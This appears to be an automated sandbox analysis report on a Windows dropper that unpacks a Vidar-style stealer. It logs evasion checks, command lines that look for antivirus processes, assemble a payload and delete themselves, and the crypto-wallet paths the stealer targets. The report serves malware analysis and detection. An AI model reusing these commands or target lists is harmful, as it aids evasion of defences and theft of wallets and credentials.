Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A826DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		11_2_00A826DD
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A0FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		11_2_00A0FC7C

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_11-105260

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Vibrators.com, 0000000B.00000003.1708781553.00000000036A1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

API coverage: 3.7 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 2280

Thread sleep count: 90 > 30

Source: C:\Windows\SysWOW64\findstr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem

Source: C:\Windows\SysWOW64\findstr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A5DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_00A5DC54
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A6A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_00A6A087
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A6A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_00A6A1E2
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A5E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_00A5E472
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A6A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_00A6A570
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A666DC FindFirstFileW,FindNextFileW,FindClose,	11_2_00A666DC
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A2C622 FindFirstFileExW,	11_2_00A2C622
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_00A673D4
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A67333 FindFirstFileW,FindClose,	11_2_00A67333
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A5D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_00A5D921

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_009F5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_009F5FC8

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\415434	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\415434\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: ZU3O8G.11.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: ZU3O8G.11.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: ZU3O8G.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: ZU3O8G.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Vibrators.com, 0000000B.00000002.2505005731.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2504350523.0000000000F03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msedge.exe, 00000015.00000003.2039916486.00007B6000358000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: ZU3O8G.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: ZU3O8G.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: ZU3O8G.11.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: ZU3O8G.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: ZU3O8G.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: msedge.exe, 00000015.00000002.2055194873.00000190C4253000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2198132143.000002607D045000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ZU3O8G.11.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: ZU3O8G.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: ZU3O8G.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: ZU3O8G.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: ZU3O8G.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: Vibrators.com, 0000000B.00000002.2505005731.00000000036AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: ZU3O8G.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: ZU3O8G.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: ZU3O8G.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: ZU3O8G.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: ZU3O8G.11.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: ZU3O8G.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: ZU3O8G.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: ZU3O8G.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: ZU3O8G.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: ZU3O8G.11.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: ZU3O8G.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: ZU3O8G.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: ZU3O8G.11.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: ZU3O8G.11.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: ZU3O8G.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: ZU3O8G.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: ZU3O8G.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A6F4FF BlockInput,

11_2_00A6F4FF

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_009F338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_009F338B

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A15058 mov eax, dword ptr fs:[00000030h]

11_2_00A15058

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A520AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

11_2_00A520AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A22992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00A22992
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A10BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00A10BAF
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A10D45 SetUnhandledExceptionFilter,	11_2_00A10D45
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A10F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00A10F91

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: Vibrators.com PID: 7852, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

11_2_00A51B4D

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_009F338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_009F338B

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A5BBED SendInput,keybd_event,

11_2_00A5BBED

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A5EC9E mouse_event,

11_2_00A5EC9E

Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Adjacent Adjacent.cmd & Adjacent.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 415434	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Analyze" Arabic	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Reflected + ..\Subdivision + ..\Change + ..\Checked o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com Vibrators.com o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\415434\Vibrators.com" & rd /s /q "C:\ProgramData\WBIEKNG4E3WB" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A514AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

11_2_00A514AE

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A51FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

11_2_00A51FB0

Source: Vibrators.com, 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmp, Wife.0.dr, Vibrators.com.2.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Vibrators.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A10A08 cpuid

11_2_00A10A08

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A4E5F4 GetLocalTime,

11_2_00A4E5F4

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A4E652 GetUserNameW,

11_2_00A4E652

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A2BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_00A2BCD2

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 11.2.Vibrators.com.39b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1708990346.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1708846807.0000000000F23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2507233828.00000000039B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2504350523.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2504454906.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1708781553.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vibrators.com PID: 7852, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
